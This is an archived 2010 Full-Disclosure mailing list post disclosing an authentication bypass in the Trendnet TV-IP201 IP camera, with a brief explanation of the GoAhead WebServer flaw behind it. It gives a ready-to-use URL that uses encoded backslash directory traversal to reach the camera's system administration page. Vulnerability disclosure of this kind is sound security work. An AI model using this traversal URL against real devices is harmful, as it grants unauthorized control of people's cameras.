lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <9c9715301002161341t2b8e5c53xe84be392be251860@mail.gmail.com> Date: Tue, 16 Feb 2010 16:41:42 -0500 From: opticfiber <opticfiber@...sight.net> To: full-disclosure@...ts.grok.org.uk Subject: Directory traversal & authentication bypass of Trendnet TV-IP201 simply go to http://ipaddress of camera/..%5C..%5C..%5C..%5C..%5C..%5C/config/tcfg_system.asp (system administration page) These cams use an embedded version of GoAhead WebServer which is vulnerable to the above attack because they don't correctly filter URL encoded substitutions for the '/' character. Original vulnerability and further explanation posted here: http://www.securityfocus.com/bid/5197/info William Reyor -- Genius is one percent inspiration and ninety-nine percent perspiration. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/